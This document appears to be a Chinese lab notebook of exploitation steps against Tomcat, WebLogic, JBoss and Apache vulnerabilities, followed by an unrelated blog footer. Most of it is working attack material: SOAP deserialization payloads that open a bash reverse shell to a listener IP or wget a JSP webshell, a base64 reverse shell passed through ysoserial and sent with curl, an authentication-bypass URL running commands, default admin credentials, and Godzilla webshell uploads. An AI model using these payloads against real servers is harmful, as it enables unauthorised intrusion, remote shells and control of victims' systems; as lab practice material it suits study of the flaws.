⼀、Tomcat

1.1 CVE-2017-12615

1.搭建环境

2.进入网站

3.抓包

将GET改为PUT,用哥斯拉生成木马,贴在后面

4.用哥斯拉连接

测试

1.2 后台弱⼝令部署war包

1.搭建环境

2.进入页面,登录

帐号密码都是tomcat

3.制作war包


4.上传

5.打开

用哥斯拉连接

1.3 CVE-2020-1938

1.搭建环境

2.进入页面

python "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 8.152.98.193

1.4 读取8.141.0.63:8080 WEBINF下有个flag文件

python "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/flag 8.141.0.63

⼆、WebLogic

2.1 后台弱⼝令GetShell

1.搭建环境(要修改版本,vi后,添加version:"3")

2.访问页面

访问8.152.98.193:7001/console/login/LoginForm.jsp
3.登录   weblogic Oracle@123
4.点击部署,安装,上载文件
一直点击下一步
5.访问部署的war文件
6.连接哥斯拉

2.2 CVE-2017-3506

1.搜索

http://8.152.98.193:7001/wls-wsat/CoordinatorPortType

抓包

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <object class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>/bin/bash</string>
              </void>
              <void index="1">
                <string>-c</string>
              </void>
              <void index="2">
                <string>bash -i &gt;&amp; /dev/tcp/8.152.98.193/6666 0&gt;&amp;1</string>
              </void>
            </array>
          <void method="start"/></object>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

开启监听(先监听,在放行)

2.3 CVE-2019-2725

1.搜索http://8.152.98.193:7001/_async/AsyncResponseService

2.抓包

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://8.152.98.193/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.访问木马

http://8.152.98.193:7001/bea_wls_internal/1.jsp

4.连接哥斯拉

2.4 CVE-2018-2628

1.启动环境(改配置文件version: "3")

2.访问网站

3.用工具检查漏洞

2.5 CVE-2018-2894

1.启动环境

2.获取密码

docker-compose logs | grep password
域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚
3.进入8.152.98.193 :7001/ws_utc/config.do设置
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4.点击安全,添加

5.右击检查

6.连接

8.152.98.193:7001/ws_utc/css/config/keystore/1753963639243 _shell.jsp

2.6 CVE-2020-14882

1.启动环境

2.访问管理控制台
http://8.152.98.193:7001/console/login/LoginForm.jsp
3.使⽤以下url绕过登录认证
http://8.152.98.193:7001 /console/css/%252e%252e%252fconsole.portal
4.⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令
 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")
我们进⼊到docker中可以看到命令已经成功运⾏了

三、Jboss

3.1 CVE-2015-7501

1.启动环境

2.打开页面

3.访问http://8.152.98.193:8080/invoker/JMXInvokerServlet

存在漏洞

4.base64编码

bash -i >& /dev/tcp/8.152.98.193/5555 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1Mi45OC4xOTMvNTU1NSAwPiYxCg==

ysoserial-all.jar CommonsCollections5 "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1Mi45OC4xOTMvNTU1NSAwPiYxCg== }|{base64,-d}| {bash,-i} ">exp.ser
5.监听
curl http://8.152.98.193:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

3.2 CVE-2017-7504

1.启动环境

2.访问页面

http://8.152.98.193:8080/jbossmq-httpil/HTTPServerILServlet
python3 jexboss.py -u http://8.152.98.193:8080

3.3 CVE-2017-12149

1.启动环境

2.访问页面

3.验证是否有漏洞

http://8.152.98.193:8080/invoker/readonly

4.用工具

3.4 Administration Console弱⼝令

还是CVE-2017-12149

1.访问http://8.152.98.193:8080/admin-console/login.seam

2.登录后台

admin vulhub
点击Web Application (WAR),上传后门
3.连接哥斯拉

3.5 低版本JMX Console未授权

开启CVE-2017-7504

1.打开页面http://8.152.98.193:8080/jmx-console/

2.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去

3.6 ⾼版本JMX Console未授权

开启CVE-2017-12149

1.打开页面http://8.152.98.193:8080/jmx-console/

2.在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

3.上传war

4.访问

四、Apache

CVE-2021-41773

1.搭建环境

docker pull blueteamsteve/cve-2021-41773:no-cgid

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
2.访问
3.检测漏洞
# 中间件
Logo
2048 AI社区

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐

AI+零信任:下一代数据安全智能体的架构演进

在当今数字化时代,数据安全面临着前所未有的挑战。传统的数据安全防护体系已经难以应对日益复杂多变的安全威胁。AI(人工智能)与零信任理念的结合为数据安全带来了新的思路和解决方案,催生出下一代数据安全智能体。本文将深入探讨AI与零信任结合的架构演进,从核心概念、原理、具体实现,到实际应用场景、面临的挑战和未来发展趋势等方面进行全面分析,旨在帮助开发者和安全从业者深入理解这一新兴领域。

avatar 2048 AI社区

探索Nginx:深入理解Nginx基础组件的使用

Nginx的每个进程内部都有一个自己的ngx_cycle。展开代码语言:C自动换行AI代码解释void *tag;*/ };

avatar 2048 AI社区

提示工程架构师必看:Agentic AI 的6个未来技术突破点

工具元数据描述:用结构化语言定义工具的功能、输入输出、依赖关系,比如:{"工具名称": "物流API","功能描述": "查询快递的实时状态","输入参数": ["订单号"],"输出参数": ["快递位置", "预计到达时间"],"依赖工具": []规划引导prompt:让Agent理解「如何根据任务目标规划工具链」,比如:“你需要处理用户的问题:{用户问题}。首先,拆解任务目标为多个子任务;然后

avatar 2048 AI社区